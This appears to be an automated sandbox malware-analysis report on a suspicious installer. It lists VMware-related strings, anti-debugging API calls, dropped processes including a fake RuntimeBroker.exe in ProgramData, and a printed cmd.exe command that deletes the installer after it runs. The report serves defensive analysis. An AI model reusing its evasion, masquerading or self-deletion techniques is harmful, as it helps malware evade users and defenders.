                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.browseForConfig.fileFilter)VMware configuration files (*.vmx;*.vmtm)|*.vmx;*.vmtm|Open Virtual Machine Format files (*.ovf;*.ova)|*.ovf;*.ova|All supported files|*.vmx;*.vmtm;*.ovf;*.ova|All files|*.*||
                    Source: winPre2k.iso.0.drBinary or memory string: mkisofs 1.15a12 -v -J -R -V VMware Tools -o d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/output/windows.iso d:/build/ob/bora-1463223/bora-vmsoft/build/release/install/winimage
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: tools.capability.hgfs_server %s %s
                    Source: winPre2k.iso.0.drBinary or memory string: tatVM_LaunchTray_SetDataVM_LaunchUserProcessLancement d'une application d'utilisateur VMwareVM_LaunchUserProcess_SetDataVM_PatchBatchFilesCorrection de fichiers de commandeVM_Stop9xServiceArr
                    Source: winPre2k.iso.0.drBinary or memory string: 0VMware
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: HgfsServerGetAccess: error: prefix too long
                    Source: winPre2k.iso.0.drBinary or memory string: VM_Launch9xServiceVMware
                    Source: winPre2k.iso.0.drBinary or memory string: Es konnte nicht ermittelt werden, mit welchem VMware-Produkt diese virtuelle Maschine ausgef
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi" TRANSFORMS="D:\1031.mst"
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: s VMGuestLibErrorException.html
                    Source: wm.exe.0.drBinary or memory string: vmwarewui.dll
                    Source: winPre2k.iso.0.drBinary or memory string: PCI\VEN_15AD&DEV_0720PCI\VEN_1022&DEV_2000crosstalkvmscsivmxnetvmmousevmx_oemCan't check for unknown device class: %sIncorrect Cross talk device: %sFound correct Cross talk device: %sSetupDiGetDeviceRegistryProperty failed: %dSystemFound incorrect SCSI device: %sFound correct SCSI device: %sVEN_104BSCSIAdapterFound incorrect Display device: %sFound correct Display device: %sVEN_15ADDisplayFound incorrect Audio device: %sFound correct Audio device: %sVEN_1274&DEV_1371AudioFound correct Mouse device: %sFound incorrect Mouse device: %sPNP0F0BPNP0F03PNP0F13PNP0F0EMouseFound vmxnet deviceComparing hardware ID: %sfailed to destroy driver list %d
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.sysNTja
                    Source: wm.exe.0.drBinary or memory string: VMware, Inc.1
                    Source: winPre2k.iso.0.drBinary or memory string: VMware, Inc.0
                    Source: winPre2k.iso.0.drBinary or memory string: VM_LaunchTray_SetDataVM_LaunchUserProcessVMware
                    Source: wm.exe.0.drBinary or memory string: The VMware Authorization Service is not running, so the virtual machines cannot be run in the background. You can choose to suspend them for later use or power them off now.
                    Source: winPre2k.iso.0.drBinary or memory string: FileDescriptionVMware installation launcherH
                    Source: winPre2k.iso.0.drBinary or memory string: vmmemctl.sys
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusVM.vmNetWorksViewAll)View All...
                    Source: winPre2k.iso.0.drBinary or memory string: chten.CompTextInstalliert nur die von diesem VMware-Produkt verwendeten Programmfunktionen. W
                    Source: winPre2k.iso.0.drBinary or memory string: VMware
                    Source: winPre2k.iso.0.drBinary or memory string: %s change user /INSTALLSOFTWARE\Microsoft\.NETFramework\policy\v1.1\Microsoft.NET\Framework\v1.1.kernel32IsWow64ProcessHKEY_USERSHKEY_LOCAL_MACHINEHKEY_CURRENT_USERHKEY_CURRENT_CONFIGHKEY_CLASSES_ROOTSOFTWARE\VMware, Inc.\VMware Tools\Private%s: %s%m/%d/%y %H:%M:%S Failed to install inf: 0x%08xSuccessfully installed infFailed to get proc address for SetupCopyOEMInfASetupCopyOEMInfAFailed to load setupapi.dll: %dsetupapi.dllAttempting to pre-install inf file: "%s"UpdateDriverForPlugAndPlayDevicesA failed: %dUpdateDriverForPlugAndPlayDevicesA succeededFailed to find UpdateDriverForPlugAndPlayDevicesA: %dUpdateDriverForPlugAndPlayDevicesAFailed to load newdev.dll: %dnewdev.dll...\*NT OS Type is unknown: Major: %i Minor: %iFailed to free module: %dCannot free NULL libraryFreeing library: %dFailed to create key %s: %dFailed to set value: %s\%s\%s: %dCannot query key value %s\%s\%s: %ldCannot open the registry %s\%s: %ldCannot query key value %s\%s\%s: %dInvalid keyName in Util_CreateKey
                    Source: winPre2k.iso.0.drBinary or memory string: un produit VMware[Une autre instance du programme d'installation est d
                    Source: winPre2k.iso.0.drBinary or memory string: 0123456789ABCDEF''"'"7.7.0VMware Toolsd:/build/ob/bora-1463223/bora/lib/productState/productState.cSOFTWARE\VMware, Inc.\%sGetDiskFreeSpaceExA
                    Source: winPre2k.iso.0.drBinary or memory string: VMMEMCTL
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareTray.exe
                    Source: winPre2k.iso.0.drBinary or memory string: [VMware, Inc.]
                    Source: winPre2k.iso.0.drBinary or memory string: s vmmouse.sysNTen
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: UpgraderTcloCapReg: Failed to register HGFS server capability.
                    Source: wm.exe.0.drBinary or memory string: Bvmware.wui.control.piechart
                    Source: winPre2k.iso.0.drBinary or memory string: 1) VMware Tools
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools UninstallationCThe VMware Tools should only be installed inside a virtual machine.xThis version of VMware product is too old. You cannot install this version of the VMware Tools in this virtual machine.xSetup failed to determine which VMware product this virtual machine is running on. Click OK to cancel the installation.
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools Installation
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: V@SunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDeccacheMod: Failed to write to databasecacheMod: Success!cacheMod: Failed to open package: %ucacheMod: Opening package: %scacheMod: Failed to get package path: %uLocalPackagecacheMod: Preparing the existing product install for removalUPDATE InstallUISequence SET Condition='0' WHERE Action='IsForceReboot.6FC97963_2511_11D4_BB8A_00C04F20D375'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='IsForceReboot.6FC97963_2511_11D4_BB8A_00C04F20D375'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='ScheduleReboot'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallVMXNetDriver'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallVideoDriver'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallMouseDriver'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallHgfsDriverNT'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UninstallBuslogicDriver'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UnmountImageSuccess'UPDATE InstallExecuteSequence SET Condition='0' WHERE Action='VM_UnmountImage'0123456789abcdef?0123456789ABCDEF?(null)INFinfNANnan0123456789abcdef0123456789ABCDEF(null)
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools n0
                    Source: wm.exe.0.drBinary or memory string: ModuleModule_RawREGISTRYAPPIDuser,Usage: vmware [OPTION ...] [--] [configuration file(s)]
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.browseForConfig.fileFilter)VMware configuration files (*.vmx;*.vmtm)|*.vmx;*.vmtm|Open Virtual Machine Format files (*.ovf;*.ova)|*.ovf;*.ova|All supported files|*.vmx;*.vmtm;*.ovf;*.ova|All files|*.*||.vmx.cfg@&!*@*@(msg.vmuiApp.openGeneric.internalFile)"%s" cannot be opened directly. Open the virtual machine configuration file (.vmx) instead.@&!*@*@(msg.vmuiApp.openGeneric.unrecognizedType)"%s" is not a virtual machine configuration file (.vmx).VMwareHostd@&!*@*@(msg.vmuiWin32.sharingDisabled)VM sharing is currently disabled. Go to Edit > Preferences > Shared VMs to enable sharing.Open object error: %s
                    Source: winPre2k.iso.0.drBinary or memory string: VM_Stop9xServiceVMware
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.inf9X
                    Source: wm.exe.0.drBinary or memory string: VMware Workstation
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.drBinary or memory string: canSupportVMDBHGFSMgmt
                    Source: winPre2k.iso.0.drBinary or memory string: VMware Tools.msiT_
                    Source: winPre2k.iso.0.drBinary or memory string: name="VMware.VMware.upgrader"
                    Source: wm.exe.0.drBinary or memory string: VMwareLogo: TBox { # Necessary for padding.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: cificationsVM_CleanLegacyToolsSuppression d'une installation de Tools existanteVM_CleanLegacyTools_SetDataVM_InstallHgfsDriverNTInstallation d'un pilote des dossiers partag
                    Source: winPre2k.iso.0.drBinary or memory string: s!vmmouse.infNTen3
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARETOOLS_CMNAPPDATA
                    Source: winPre2k.iso.0.drBinary or memory string: Received upgrader.run from vmware
                    Source: winPre2k.iso.0.drBinary or memory string: 0VMware
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.runError)Unable to run the VMware support script. Contact VMware customer support for further assistance.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: HgfsServerGetDents: Error: Name "%s" is too long.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Failed to install 64 bit hgfs driver.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VM_CleanLegacyTools_SetDataVM_InstallHgfsDriverNT
                    Source: winPre2k.iso.0.drBinary or memory string: msiexec -i "D:\VMware Tools.msi" TRANSFORMS="D:\1041.mst"
                    Source: winPre2k.iso.0.drBinary or memory string: a VMware product9Another instance of setup is already running. Exiting...
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.statusVM.vmNetWorksUnavailable)Network information is not available@&!*@*@(msg.vmui.statusVM.editVM)Edit virtual machine settings@&!*@*@(msg.vmui.statusVM.upgradeVM)Upgrade this virtual machine@&!*@*@(msg.vmui.statusVM.connectPort)View appliance management pageXUI_SUMMARYPAGEButtonBox@&!*@*@(msg.vmui.statusVM.vmState)State:@&!*@*@(msg.vmui.statusVM.vmSnapshot)Snapshot:@&!*@*@(msg.vmui.statusVM.vmCfgFile)Configuration file:@&!*@*@(msg.vmui.statusVM.vmCloneOf)Clone of:@&!*@*@(msg.vmui.statusVM.vmVersion)Hardware compatibility:@&!*@*@(msg.vmui.statusVM.vmIPAddress)Primary IP address:@&!*@*@(msg.vmui.statusVM.vmNetWorksViewAll)View All...DeviceGroup@&!*@*@(msg.vmui.statusVM.group.deviceGroup)DevicesDescriptionGroupDetailGroup@&!*@*@(msg.vmui.statusVM.group.vmDetailGroup)Virtual Machine DetailsVersionLabel@&!*@*@(msg.vmui.statusVM.appliance.version)Version:AuthorLabel@&!*@*@(msg.vmui.statusVM.appliance.author)Author:EditBoxVMThumbnailDeviceGridDetailGrid@&!*@*@(msg.vmui.statusVM.power.suspended)Suspended@&!*@*@(msg.vmui.statusVM.power.powerOff)Powered off@&!*@*@(msg.vmui.statusVM.power.powerOn)Powered onbora\apps\vmuiWin32\vmuiStatusVM.cppXUI_TAB_VM_SUSPEND_32x32@&!*@*@(msg.vmui.statusVM.powerAction.resume)Resume this virtual machineXUI_TAB_VM_32x32@&!*@*@(msg.vmui.statusVM.powerAction.powerOn)Power on this virtual machineXUI_TAB_VM_ON_32x32@&!*@*@(msg.vmui.statusVM.powerAction.powerOnDisabled)Power on this virtual machineVersionVersionBoxAuthorAuthorBoxDtW
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: toolbox/windows/hgfslib/hgfsServer.croot
                    Source: winPre2k.iso.0.drBinary or memory string: vmware-nic.inf
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.inf
                    Source: wm.exe.0.drBinary or memory string: http://www.vmware.com/0/
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.vxd
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareService.exe9X
                    Source: wm.exe.0.drBinary or memory string: name="VMware.VMware.vmui"
                    Source: winPre2k.iso.0.drBinary or memory string: name="VMware.VMware.setup"
                    Source: winPre2k.iso.0.drBinary or memory string: s VMwareRepairText&R
                    Source: winPre2k.iso.0.drBinary or memory string: Anweisungen zur Installation der VMware Tools auf einem Windows NT-Gastsystem unter Verwendung einer Service Pack-Version niedriger als Version 6.
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VMware Tools
                    Source: wm.exe.0.drBinary or memory string: ?ShowVmnetcfg@vmnetcfg@util@wui@@YAXXZ
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools\Private
                    Source: Wegame.exe, 00000003.00000002.3337336864.0000000000847000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000006.00000002.3337790598.0000000001612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibJava.dll
                    Source: winPre2k.iso.0.drBinary or memory string: For information on updating your VMware Tools please see
                    Source: winPre2k.iso.0.drBinary or memory string: lectionnez VMware, Inc.
                    Source: wm.exe.0.drBinary or memory string: Please wait until the operation is complete or cancel the cleaning up.@&!*@*@(msg.vmui.disallowExit.vmBusy)Virtual machine %s is busy.@&!*@*@(msg.vmui.dialog.loginVca.title)Connect to VMware vCloud Air@&!*@*@(msg.vmui.dialog.loginVca.caption)Enter your VMware vCloud Air credentials.@&!*@*@(msg.vmuiApp.login.errorFmt)Failed to connect to %s. %s@&!*@*@(msg.vmuiApp.closeCurrentSession.busyCleaningUp)"%s" is still busy on cleaning up disks.
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: ZB1 argument requiredtools.capability.hgfs_server %s %s01f
                    Source: wm.exe.0.drBinary or memory string: @&!*@*@(msg.vmui.collectSupportData.vmName)Virtual Machine@&!*@*@(msg.vmui.collectSupportData.toolsServiceState)VMware Tools@&!*@*@(msg.vmui.collectSupportData.vmFileName)Location@&!*@*@(msg.vmui.collectSupportData.toolsServiceRunning)Running@&!*@*@(msg.vmui.collectSupportData.toolsOutOfDate)Out of date@&!*@*@(msg.vmui.collectSupportData.toolsUnknown)Unknown@&!*@*@(msg.vmui.collectSupportData.toolsServiceNotRunning)Not running@&!*@*@(msg.vmui.collectSupportData.fileFilter)Zip archives (*.zip)|*.zip||vmsupport-%u-%02u-%02u-%02u-%02uzip@&!*@*@(msg.vmui.collectSupportData.progressGuestMessage)Collecting guest OS support data ...@&!*@*@(msg.vmui.collectSupportData.progressHostMessage)Collecting host OS support data ...bora\apps\vmuiWin32\vmuiCollectSupportData.cpp//Nologovm-support.vbs-q-o-v|Collecting support data
                    Source: winPre2k.iso.0.drBinary or memory string: VMwareUser9x.exe
                    Source: winPre2k.iso.0.drBinary or memory string: SOFTWARE\VMware, Inc.
                    Source: wm.exe.0.drBinary or memory string: Software\VMware, Inc.\Running VM List
                    Source: wm.exe.0.drBinary or memory string: CompanyNameVMware, Inc.N
                    Source: wm.exe.0.drBinary or memory string: <description>"VMware Workstation"</description>
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: QA"HgfsServerGetAccess: error: prefix too long
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMGuestLibHandle.html
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: vmGuestLibJava.lib_win32
                    Source: winPre2k.iso.0.drBinary or memory string: vmmouse.infNTen
                    Source: winPre2k.iso.0.drBinary or memory string: Failed to delete key %s: %dWarning: Deleting a key that isn't empty: "%s\%s"Create Process failed: %dNo exit code returned from async processFailed to get process exit code: %dProcess returned %dAttempting to launch "%s"%sFailed to allocate space for command line%s %sFile "%s" doesn't existERROR: The file copy operation failed: %uCopy '%s' to '%s'Cannot copy non-existent file: %srDeleted file %sFailed to delete %s: %dAlready removed: %sDeleting %sTerminate Process failed: %dprocess terminated succesfullyProcess exited cleanly"%s" %sEmpty filename so exiting"%s" /s"%s" /u /s%s\regsvr32.exeFailed to get system directoryCan't register non-existent file: %sFailed to reset working directory to %s: %dDirect call to %s failed: %dSuccessfully %s dll: "%s\%s"registeredunregisteredFailed to find %s export in "%s"DllRegisterServerDllUnregisterServerFailed to load dll "%s\%s": %dFailed to set new working directory to %s: %dFailed to save old working directory: %dCan't %s non-existent dll: "%s"registerunregistervmreboot.tmpFailed to get temp pathChecking for reboot stateCould not find a backslash in: %sUnable to find(%d): %sDeleting fileset: %sCould not create directory %s (%d).\StringFileInfo\%s\%s%u,%u,%u,%uGetProcAddresss for Module32First failed %dModule32FirstGetProcAddresss for Process32Next failed %dProcess32NextGetProcAddresss for Process32First failed %dProcess32FirstGetProcAddresss for CreateToolhelp32Snapshot failed %dCreateToolhelp32SnapshotKernel32.dllFailed to remove directory, error %dFailed to find any child files or directories for %s, (%d)ExpandEnvironmentString string %s too long. Length %dUninstallFilesFailed to delete the temp file.Failed to open destination file for writing: %sFailed to make "%s" writeable: %dSetting read-only file as writeableFailed to open temporary file: %sReplacing "%s" with "%s" in file "%s"Failed to open temp file: %sFailed to expand temp path %s: %dFailed to open search file: %sCannot modify non-existent file: %s%TMP%\vmsrchTemp.txtInvalid delimiter for version %sVersion %s newer than %sVersion %s older than %sVersion %s same as %sProcess found %s with ID %dProcess list unavailable - can't find first processProcess list unavailableProcess *NOT* terminated: %sProcess terminated: %s%s with pid %d found in memory!%d is not a valid process ID.%s *NOT* found in memory.kernel32.dllMsiProcessMessage returned: %iPosting warning message %iFailed to set property: %dSetting property %s = %sMsiGetProperty failed for property %sGetting Property %s = %sFailed to get property %sVMware ToolsMEM_ALLOC %s:%d
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMUninstallHgfsDriverNT
                    Source: winPre2k.iso.0.drBinary or memory string: CompanyNameVMware, Inc.T
                    Source: winPre2k.iso.0.drBinary or memory string: InstallShieldTempPropDriversVMware
                    Source: winPre2k.iso.0.drBinary or memory string: lectionnez la carte graphique VMware SVGA II et cliquez sur OK.
                    Source: winPre2k.iso.0.drBinary or memory string: CompanyNameVMware, Inc.X
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: VMInstallHgfsDriverNT
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: uninstallHgfs
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drBinary or memory string: Installing the WinNT hgfs driver
                    Source: winPre2k.iso.0.drBinary or memory string: sinstallation de VMware ToolsBVMware Tools ne doit
                    Source: winPre2k.iso.0.drBinary or memory string: Deinstallation der VMware ToolsMDie VMware Tools sollten nur in einer virtuellen Maschine installiert werden.
                    Source: winPre2k.iso.0.drBinary or memory string: VMWARETO.EXE;1
                    Source: C:\ProgramData\RuntimeBroker.exeAPI call chain: ExitProcess graph end node
                    Source: C:\ProgramData\RuntimeBroker.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\Wegame\Wegame.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E313 IsDebuggerPresent,OutputDebugStringW,3_2_0046E313
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046CA3B __EH_prolog3_catch_GS,GetCommandLineW,SimpleUString::operator=,MessageBoxA,strcmp,?stamp_init@@YAXXZ,?stamp_point@@YAXPBD@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_client_id@util_client_info@ierd_tgp@@YAHXZ,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z,?get_process_count@util_multi_instance@ierd_tgp@@YAHPBD@Z,?set_same_client_type_multi_instance@util_multi_instance@ierd_tgp@@YAX_N@Z,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?SetIsMultiInstance@Qos@qos@adapt_for_imports@ierd_tgp@@QAEX_N@Z,?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z,OutputDebugStringA,CreateMutexA,GetLastError,?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z,OpenEventA,SetEvent,CloseHandle,CloseHandle,CloseHandle,CloseHandle,?get_log_instance@base@@YAPAVILogger@1@XZ,GetCurrentProcess,TerminateProcess,?sync_proxy_settings@client_helper@net@ierd_tgp@@YAXXZ,_stricmp,_stricmp,?enable_static_detail_log@common@ierd_tgp@@YAX_N@Z,_stricmp,?enable_profile_on@common@ierd_tgp@@YAX_N@Z,_stricmp,?enable_offline_mode_on@common@ierd_tgp@@YAX_N@Z,_stricmp,?set_restart_after_update@common@ierd_tgp@@YAX_N@Z,?set_quick_login_uin@common@ierd_tgp@@YAXK@Z,?set_start_from_host@common@ierd_tgp@@YAX_N@Z,?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV45@@Z,?enable_offline_mode_on@common@ierd_tgp@@YAX_N@Z,?set_offline_login_account@common@ierd_tgp@@YAX_K@Z,GetCommandLineW,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?set_game_launcher_flag@common@ierd_tgp@@YAX_N@Z,?set_game_launcher_msg@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_qos_instance@qos@adapt_for_imports@ierd_tgp@@YAAAVQos@123@XZ,?set_launcher_info@Qos@qos@adapt_for_imports@ierd_tgp@@QAEXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?get_log_instance@base@@YAPAVILogger@1@XZ,?is_offline_mode_on@common@ierd_tgp@@YA_NXZ,?set_game_launcher_flag@common@ierd_tgp@@YAX_N@Z,?set_game_launcher_msg@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?IsSubWegameProcess@util_multi_instance@ierd_tgp@@YA_NXZ,PathFileExistsW,PathFileExistsW,DeleteFileW,PathFileExistsW,?get_log_instance@base@@YAPAVILogge3_2_0046CA3B
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462478 __EH_prolog3_GS,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,SimpleUString::operator=,?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z,OpenProcess,SetLastError,TerminateProcess,GetLastError,?get_log_instance@base@@YAPAVILogger@1@XZ,CloseHandle,Process32NextW,CloseHandle,3_2_00462478
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00462960 __EH_prolog3_GS,memset,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,GetPrivateProfileStringW,GetPrivateProfileStringW,memset,GetPrivateProfileStringW,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,SimpleUString::operator=,?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z,?get_log_instance@base@@YAPAVILogger@1@XZ,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z,??_0path@filesystem@ierd_tgp@@QAEAAV012@PB_W@Z,PathFileExistsW,PathFileExistsA,?instance@Application@common@ierd_tgp@@SAPAV123@XZ,?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z,?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z,LoadLibraryW,GetProcAddress,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_00462960
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005EE5D0 mov eax, dword ptr fs:[00000030h]6_2_005EE5D0
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E4E4B mov eax, dword ptr fs:[00000030h]6_2_005E4E4B
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_03520B11 mov eax, dword ptr fs:[00000030h]6_2_03520B11
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005E6814 GetProcessHeap,6_2_005E6814
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046E9C2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0046E9C2
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046F8AB IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0046F8AB
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046FA0D SetUnhandledExceptionFilter,3_2_0046FA0D
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_003B17CE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,4_2_003B17CE
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7B6001 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C7B6001
                    Source: C:\Users\Statr\kill.exeCode function: 4_2_6C7BBB50 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C7BBB50
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DAF11 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_005DAF11
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB060 SetUnhandledExceptionFilter,6_2_005DB060
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DB0B5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_005DB0B5
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_005DFF5E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_005DFF5E
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_6C6B21BA IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6C6B21BA
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Wegame\Wegame.exe "C:\users\Wegame\Wegame.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Users\Statr\kill.exe "C:\users\Statr\kill.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\ProgramData\RuntimeBroker.exe "C:\ProgramData\RuntimeBroker.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nulJump to behavior
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_00401165 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,3_2_00401165
                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0046F704 cpuid 3_2_0046F704
